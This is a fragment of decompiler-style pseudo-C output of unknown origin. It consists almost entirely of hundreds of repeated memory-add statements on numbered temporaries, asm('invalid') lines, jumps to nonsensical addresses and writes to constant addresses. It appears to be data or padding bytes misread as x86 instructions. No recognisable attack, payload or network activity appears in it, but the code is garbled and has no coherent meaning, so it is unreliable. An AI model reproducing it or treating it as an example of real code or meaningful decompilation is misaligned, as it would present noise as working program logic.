				_t454 = _t768 + 1;
				 *((intOrPtr*)(_t454 + 0x4350)) =  *((intOrPtr*)(_t454 + 0x4350)) + _t454;
				 *_t454 =  *_t454 + _t454;
				_t456 = _t454 + _t693 + 1;
				_push(ds);
				 *_t456 =  *_t456 + _t456;
				 *_t456 =  *_t456 + _t456;
				 *_t456 =  *_t456 + _t456;
				 *_t456 =  *_t456 + _t456;
				 *_t456 =  *_t456 + _t456;
				 *_t456 =  *_t456 + _t456;
				 *((intOrPtr*)(_t456 + 0x1c)) =  *((intOrPtr*)(_t456 + 0x1c)) + _t718;
				_t457 = _t456 + 1;
				 *_t693 =  *_t693 + _t457;
				 *_t457 =  *_t457 + _t693;
				_t459 = _t457 + _t718 - 0x40;
				 *_t459 =  *_t459 + _t459;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t459 =  *_t459 + _t459;
				 *_t459 =  *_t459 + _t459;
				asm("les ebp, [edi]");
				_t460 = _t459 + 1;
				 *((intOrPtr*)(_t460 + 0x4350)) =  *((intOrPtr*)(_t460 + 0x4350)) + _t718;
				 *_t460 =  *_t460 + _t460;
				 *((intOrPtr*)(_t460 + 0x1e40)) =  *((intOrPtr*)(_t460 + 0x1e40)) + _t693;
				 *_t460 =  *_t460 + _t460;
				 *_t460 =  *_t460 + _t460;
				 *_t460 =  *_t460 + _t460;
				 *_t460 =  *_t460 + _t460;
				 *_t460 =  *_t460 + _t460;
				 *((intOrPtr*)(_t460 + 0x100401c)) =  *((intOrPtr*)(_t460 + 0x100401c)) + _t693;
				 *_t718 =  *_t718 + _t693;
				_t462 = _t460 + _t718 - 0x40;
				 *_t462 =  *_t462 + _t462;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t462 =  *_t462 + _t462;
				 *_t462 =  *_t462 + _t462;
				_t465 = (_t462 & 0x00000030) + 1 + _t718;
				_push(_t465);
				_t674 = _t673 + 1;
				 *_t465 =  *_t465 + _t465;
				 *_t465 =  *_t465 + _t465;
				 *((intOrPtr*)(_t465 + 0x1e42)) =  *((intOrPtr*)(_t465 + 0x1e42)) + _t693;
				 *_t465 =  *_t465 + _t465;
				 *_t465 =  *_t465 + _t465;
				 *_t465 =  *_t465 + _t465;
				 *_t465 =  *_t465 + _t465;
				 *_t465 =  *_t465 + _t465;
				_t466 = _t465 + _t465;
				asm("sbb al, 0x40");
				 *_t693 =  *_t693 + _t466;
				 *_t674 =  *_t674 + _t693;
				_t468 = _t466 + _t718 - 0x40;
				 *_t468 =  *_t468 + _t468;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t468 =  *_t468 + _t468;
				 *_t468 =  *_t468 + _t468;
				_push(_t769);
				 *_t468 =  *_t468 ^ _t468;
				asm("loopne 0x52");
				_t675 = _t674 + 1;
				 *_t468 =  *_t468 + _t468;
				 *_t468 =  *_t468 + _t468;
				_t469 = _t468 + _t675;
				_t719 = _t718 + 1;
				_push(ds);
				 *_t469 =  *_t469 + _t469;
				 *_t469 =  *_t469 + _t469;
				 *_t469 =  *_t469 + _t469;
				 *_t469 =  *_t469 + _t469;
				 *_t469 =  *_t469 + _t469;
				 *_t469 =  *_t469 + _t469;
				 *_t469 =  *_t469 + _t675;
				asm("sbb eax, 0x42560040");
				_t470 = _t469 ^ 0x2a263621;
				 *_t470 =  *_t470 + _t470;
				 *_t470 =  *_t470 + _t470;
				 *_t470 =  *_t470 + _t470;
				 *_t470 =  *_t470 + _t470;
				 *_t470 =  *_t470 + _t470;
				 *_t470 =  *_t470 + _t470;
				 *_t748 =  *_t748 + _t675;
				 *_t470 =  *_t470 + _t470;
				 *_t470 =  *_t470 + _t470;
				 *_t470 =  *_t470 + _t470;
				 *_t470 =  *_t470 + _t470;
				 *_t470 =  *_t470 + _t470;
				 *_t470 =  *_t470 + _t470;
				_t471 = _t470 |  *_t470;
				 *(_t471 + _t471) =  *(_t471 + _t471) | _t471;
				 *_t471 =  *_t471 + _t471;
				 *_t471 =  *_t471 + _t471;
				 *_t471 =  *_t471 + _t471;
				 *_t471 =  *_t471 + _t471;
				 *((intOrPtr*)(_t748 + _t675 + 0x40)) =  *((intOrPtr*)(_t748 + _t675 + 0x40)) + _t719;
				_t95 = _t471 - 0x10;
				 *_t95 =  *((intOrPtr*)(_t471 - 0x10)) + _t471;
				if( *_t95 >= 0) {
					_t675 = _t675 + _t675;
				}
				asm("invalid");
				 *_t471 =  *_t471 - 1;
				 *_t471 =  *_t471 + _t471;
				 *_t693 =  *_t693 + _t471;
				 *_t471 =  *_t471 + _t471;
				 *_t719 =  *_t719 + _t471;
				_t472 = _t471 +  *_t471;
				 *_t472 =  *_t472 + _t472;
				goto 0xb4401d65;
				asm("sbb eax, 0x1ae00040");
				_t473 = _t472 + 1;
				 *((intOrPtr*)(_t473 + 0x18)) =  *((intOrPtr*)(_t473 + 0x18)) + _t675;
				_t474 = _t473 + 1;
				 *_t474 =  *_t474 + _t675;
				 *_t474 =  *_t474 + _t474;
				 *_t474 =  *_t474 + _t474;
				_pop( *__eax);
				 *_t474 =  *_t474 + _t474;
				 *_t474 =  *_t474 + _t474;
				 *_t474 =  *_t474 + _t474;
				 *_t474 =  *_t474 + _t474;
				 *_t474 =  *_t474 + _t474;
				 *_t474 =  *_t474 + _t474;
				 *_t474 =  *_t474 + _t474;
				 *_t474 =  *_t474 + _t474;
				 *_t474 =  *_t474 + _t474;
				 *_t474 =  *_t474 + _t474;
				 *((intOrPtr*)(_t474 + 0x4f)) =  *((intOrPtr*)(_t474 + 0x4f)) + _t719;
				_t770 = _t769 - 1;
				_t676 = _t675 + 1;
				_t772 = _t770;
				_t697 = _t770;
				_t103 = _t474 + 0x72;
				 *_t103 =  *((intOrPtr*)(_t474 + 0x72)) + _t719;
				asm("outsd");
				if( *_t103 < 0) {
					L55:
					 *_t474 =  *_t474 + _t474;
					_push(_t474);
					 *_t474 =  *_t474 + _t474;
					_a83 = _a83 + _t676;
					_t719 = 0x4bc67aa0;
					goto L56;
				} else {
					_t757 =  *(_t756 + 0x65) * 0x70000073;
					_t818 = _t757;
					if(_t818 < 0) {
						L58:
						 *_t474 =  *_t474 + _t474;
						 *_t474 =  *_t474 + _t474;
						 *_t474 =  *_t474 + _t474;
						 *_t474 =  *_t474 + _t474;
						 *_t474 =  *_t474 + _t474;
						 *_t474 =  *_t474 + _t474;
						 *_t474 =  *_t474 + _t474;
						 *_t474 =  *_t474 + _t474;
						 *_t474 =  *_t474 + _t474;
						 *((intOrPtr*)(_t474 + _t474)) =  *((intOrPtr*)(_t474 + _t474)) + _t474;
						 *_t474 =  *_t474 + _t474;
						 *_t474 =  *_t474 + _t474;
						 *_t474 =  *_t474 + _t474;
						 *_t474 =  *_t474 + _t474;
						 *_t474 =  *_t474 + _t474;
						 *_t474 =  *_t474 + _t474;
					} else {
						if(_t818 >= 0) {
							 *_t474 =  *_t474 + _t474;
							 *_t734 =  *_t734 + _t697;
							if( *_t734 <= 0) {
								asm("adc byte [esi-0x5eba1fe9], 0xd0");
								_t697 = 0xae;
								_t652 = _t734;
								_t734 = _t474;
								_t474 = _t652 | 0x000000ae;
								 *_t474 =  *_t474 + _t474;
								 *_t474 =  *_t474 + _t474;
								 *_t474 =  *_t474 + _t474;
								 *_t474 =  *_t474 + _t474;
								 *_t474 =  *_t474 + _t474;
								 *_t474 =  *_t474 + _t474;
								 *_t474 =  *_t474 + _t474;
								 *_t474 =  *_t474 + _t474;
								 *_t474 =  *_t474 + _t474;
								 *_t474 =  *_t474 + _t474;
								asm("adc [eax+eax], al");
								 *_t474 =  *_t474 + _t474;
								 *_t474 =  *_t474 + _t474;
								 *_t474 =  *_t474 + _t474;
								 *_t474 =  *_t474 + _t474;
							}
							 *_t474 =  *_t474 + _t474;
							 *_t474 =  *_t474 + _t474;
							 *_t474 =  *_t474 + _t474;
							 *_t474 =  *_t474 + _t474;
							 *_t474 =  *_t474 + _t474;
							 *_t474 =  *_t474 + _t474;
							 *_t676 =  *_t676 + _t474;
							_t474 = _t474 +  *_t474;
							 *_t474 =  *_t474 + _t474;
							 *_t474 =  *_t474 + _t474;
							 *((intOrPtr*)(_t474 + _t676 + 0x4c0040)) =  *((intOrPtr*)(_t474 + _t676 + 0x4c0040)) + _t676;
							goto L55;
						}
						L56:
						_t757 =  &_a1;
						_t676 = 0x34;
						if(_t757 <= 0) {
							asm("lock jl 0x2f");
							_t697 = 0;
							 *_t474 =  *_t474 + _t474;
							goto L58;
						}
					}
				}
				 *_t474 =  *_t474 + _t474;
				 *_t474 =  *_t474 + _t474;
				 *_t474 =  *_t474 + _t474;
				 *_t474 =  *_t474 + _t474;
				 *((intOrPtr*)(_t474 + 0x28)) =  *((intOrPtr*)(_t474 + 0x28)) + _t697;
				_t475 = _t474 +  *_t474;
				 *_t475 =  *_t475 + _t475;
				 *_t475 =  *_t475 + _t475;
				asm("ror byte [ecx+0x40], 0x0");
				asm("pushfd");
				 *_t475 =  *_t475 + _t475;
				_t476 = _t475 + _t719;
				 *_t476 =  *_t476 + _t476;
				_t478 = _t476 + _t719 - 0x40;
				 *_t478 =  *_t478 + _t478;
				 *((intOrPtr*)(_t748 + 0x42)) =  *((intOrPtr*)(_t748 + 0x42)) + _t719;
				 *_t478 =  *_t478 + _t478;
				asm("aas");
				_t678 = _t676 + 1;
				_t479 = _t478 + _t678;
				asm("adc eax, 0x50080000");
				_t720 = _t719 + _t719;
				asm("adc eax, 0x50000040");
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				 *_t479 =  *_t479 + _t479;
				_t480 = _t479 + _t479;
				asm("sbb al, [eax]");
				 *_t480 =  *_t480 + _t480;
				 *_t480 =  *_t480 + _t480;
				 *_t480 =  *_t480 + _t480;
				 *_t480 =  *_t480 + _t480;
				asm("lock sub eax, 0x40");
				 *_t480 =  *_t480 + _t480;
				 *(_t678 + 0x44) =  *(_t678 + 0x44) << 0;
				asm("invalid");
				asm("invalid");
				 *_t480 =  *_t480 + _t480;
				 *_t480 =  *_t480 + _t480;
				if( *_t480 != 0) {
					_t650 = _t480 + 1;
					 *((intOrPtr*)(_t650 + 0x43 + _t720 * 2)) =  *((intOrPtr*)(_t650 + 0x43 + _t720 * 2)) + _t697;
					 *_t650 =  *_t650 + _t650;
					 *_t650 =  *_t650 + _t650;
					 *_t650 =  *_t650 + _t697;
					_t720 = _t720 + 1;
					 *_t650 =  *_t650 + _t650;
					 *_t650 =  *_t650 + _t650;
					 *_t650 =  *_t650 + _t650;
					 *_t650 =  *_t650 + _t650;
					 *_t650 =  *_t650 + _t650;
					 *_t650 =  *_t650 + _t650;
					 *_t650 =  *_t650 + _t697;
					 *_t650 =  *_t650 & _t650;
					 *_t650 =  *_t650 + _t650;
					 *_t650 =  *_t650 + _t650;
					_t651 = ds;
					_t697 = _t697 - 1;
					_t480 = _t651 + 1;
					 *_t480 =  *_t480 + _t480;
					 *_t480 =  *_t480 + _t480;
					 *_t480 =  *_t480 + _t697;
					 *_t480 =  *_t480 & _t480;
				}
				 *_t480 =  *_t480 + _t480;
				 *_t480 =  *_t480 + _t480;
				asm("adc [ecx], ah");
				_t481 = _t480 + 1;
				 *_t481 =  *_t481 + _t481;
				 *_t481 =  *_t481 + _t481;
				 *_t697 =  *_t697 + _t697;
				_t482 = _t481 + 1;
				 *_t697 =  *_t697 + _t697;
				 *_t482 =  *_t482 + _t482;
				 *_t482 =  *_t482 + _t720;
				 *_t482 =  *_t482 & _t482;
				 *_t482 =  *_t482 + _t482;
				_push(0x78006c00);
				_t483 = _t482 &  *_t482;
				_push(_t772);
				_push(_t734);
				 *_t483 =  *_t483 + _t483;
				 *_t483 =  *_t483 + _t483;
				 *((intOrPtr*)(_t757 + 0x23 + _t720 * 2)) =  *((intOrPtr*)(_t757 + 0x23 + _t720 * 2)) + _t720;
				 *((intOrPtr*)(_t483 + 0x49)) =  *((intOrPtr*)(_t483 + 0x49)) + _t697;
				_t484 = _t483 + 1;
				 *((intOrPtr*)(_t484 + 0x49)) =  *((intOrPtr*)(_t484 + 0x49)) + 1;
				_t485 = _t484 + 1;
				 *_t485 =  *_t485 + _t485;
				asm("adc eax, [eax]");
				_t486 = _t485 ^ 0x00000000;
				 *_t486 =  *_t486 + _t486;
				_t488 = (_t486 ^ 0x00000032) + 1;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + _t488;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + _t488;
				 *_t488 =  *_t488 + _t488;
				 *_t488 =  *_t488 + _t488;
				 *_t488 =  *_t488 + _t488;
				 *_t488 =  *_t488 + _t488;
				 *((intOrPtr*)(_t488 + 0x22)) =  *((intOrPtr*)(_t488 + 0x22)) + 1;
				_t489 = _t488 + 1;
				 *((intOrPtr*)(_t489 + 0x31)) =  *((intOrPtr*)(_t489 + 0x31)) + _t720;
				asm("sbb eax, 0x40332800");
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + _t489;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + _t489;
				 *_t489 =  *_t489 + _t489;
				_t490 = _t489 | 0x00003800;
				 *((intOrPtr*)(_t490 + 0x8004049)) =  *((intOrPtr*)(_t490 + 0x8004049)) + _t697;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + _t490;
				 *_t490 =  *_t490 + _t490;
				 *_t490 =  *_t490 + _t490;
				 *_t490 =  *_t490 + _t490;
				 *_t490 =  *_t490 + _t490;
				_t492 = _t490 + 2 &  *(_t490 + 2);
				asm("invalid");
				asm("sbb eax, 0x40499800");
				 *_t492 =  *_t492 + _t697;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + _t492;
				 *_t492 =  *_t492 + _t492;
				asm("adc eax, [eax]");
				 *_t492 =  *_t492 + _t492;
				_t494 = (_t492 ^ 0x00000032) + 1;
				 *0x300 =  *0x300 + _t494;
				 *_t494 =  *_t494 + _t494;
				 *_t494 =  *_t494 + _t494;
				 *_t494 =  *_t494 + _t494;
				 *_t494 =  *_t494 + _t697;
				_t495 = _t494 &  *_t494;
				if(_t495 >= 0) {
					asm("sbb eax, 0x4032e000");
					 *0x40000300 =  *0x40000300 + _t495;
					 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + _t720;
					 *_t495 =  *_t495 + _t495;
					 *_t495 =  *_t495 + _t495;
					_t495 = (_t495 ^ 0x00000032) + 1;
					 *_t734 =  *_t734 + _t495;
					 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + _t495;
					 *_t495 =  *_t495 + _t495;
					 *_t495 =  *_t495 + _t495;
					 *_t495 =  *_t495 + _t495;
					 *_t495 =  *_t495 + _t495;
					 *0x31700042 =  *((intOrPtr*)(0x31700042)) + _t697;
					asm("sbb eax, 0x40331c00");
					 *_t734 =  *_t734 + _t495;
					 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + _t495;
				}
				 *_t495 =  *_t495 + _t495;
				asm("adc eax, [eax]");
				_t773 = _t772 + 1;
				 *_t495 =  *_t495 + _t495;
				 *((intOrPtr*)(_t720 + _t748)) =  *((intOrPtr*)(_t720 + _t748)) + _t720;
				_t496 = _t495 + 1;
				 *_t748 =  *_t748 + _t496;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + _t496;
				 *_t496 =  *_t496 + _t496;
				 *_t496 =  *_t496 + _t496;
				 *_t496 =  *_t496 + _t496;
				 *_t496 =  *_t496 + _t496;
				_t498 = _t496 + _t720 &  *(_t496 + _t720);
				if(_t498 >= 0) {
					asm("sbb eax, 0x4032d400");
					 *_t748 =  *_t748 + _t498;
					 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + _t498;
					 *_t498 =  *_t498 + _t498;
					asm("adc eax, [eax]");
					_t648 = _t498 - 1;
					 *_t648 =  *_t648 + _t648;
					 *((intOrPtr*)(_t720 + _t748)) =  *((intOrPtr*)(_t720 + _t748)) + _t720;
					_t498 = _t648 + 1;
					 *_t697 =  *_t697 + _t498;
					 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + _t498;
					 *_t498 =  *_t498 + _t498;
					 *_t498 =  *_t498 + _t498;
					 *_t498 =  *_t498 + _t498;
					 *_t498 =  *_t498 + _t498;
					_a10 = _a10 + _t720;
					 *((intOrPtr*)(_t498 + 0x31)) =  *((intOrPtr*)(_t498 + 0x31)) + _t720;
					asm("sbb eax, 0x40324400");
					 *_t697 =  *_t697 + _t498;
					 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + _t498;
				}
				 *_t498 =  *_t498 + _t498;
				_pop(ds);
				 *((intOrPtr*)(_t498 + _t498)) =  *((intOrPtr*)(_t498 + _t498)) + _t697;
				_t500 = _t498 + 2 ^  *(_t498 + 2);
				asm("invalid");
				asm("invalid");
				 *_t500 =  *_t500 + _t500;
				 *_t500 =  *_t500 + _t500;
				 *_t500 =  *_t500 + _t500;
				 *_t500 =  *_t500 + _t500;
				 *0x40330800 =  *0x40330800 ^ 2;
				asm("invalid");
				 *0x80004024 =  *0x80004024 + 1;
				asm("adc eax, [eax]");
				_push(0x80004024);
				 *0x80004024 = 0x80004024 +  *0x80004024;
				 *((intOrPtr*)(_t720 + _t748)) =  *((intOrPtr*)(_t720 + _t748)) + _t720;
				 *0xFFFFFFFF00008048 =  *((intOrPtr*)(0xffffffff00008048)) + 0xffffffff80004025;
				_t503 = 0xffffffff80004025 +  *((intOrPtr*)(0xffffffff80004025));
				 *0x80004024 =  *0x80004024 + _t503;
				 *0x80004024 =  *0x80004024 + _t503;
				 *0x80004024 =  *0x80004024 + _t503;
				 *0x80004024 =  *0x80004024 + _t503;
				_t774 = _t773 - 1;
				_t504 = _t503 & 0x31700040;
				asm("sbb eax, 0x4032ec00");
				 *((intOrPtr*)(0xffffffff00008048)) =  *((intOrPtr*)(0xffffffff00008048)) + _t504;
				 *0x00000004 =  *((intOrPtr*)(4)) + _t720;
				 *((intOrPtr*)(0xffffffff00008048)) =  *((intOrPtr*)(0xffffffff00008048)) + _t720;
				 *((intOrPtr*)(_t720 + _t748)) =  *((intOrPtr*)(_t720 + _t748)) + _t720;
				_t507 = _t504 +  *_t504 + 2;
				 *_t720 =  *_t720 + _t507;
				 *((intOrPtr*)(4)) =  *((intOrPtr*)(4)) + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0xFFFFFFFFF0008049 =  *((intOrPtr*)(0xfffffffff0008049)) + _t720;
				 *0x40331000 =  *0x40331000 ^ 4;
				 *_t720 =  *_t720 + _t507;
				 *((intOrPtr*)(4)) =  *((intOrPtr*)(4)) + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t720;
				 *0x80004024 =  *0x80004024 & 0x80004024;
				 *0x80004024 =  *0x80004024 & _t507;
				asm("sbb [eax], al");
				_t721 = _t774;
				asm("sbb [eax], al");
				asm("pushad");
				asm("sbb [eax], al");
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
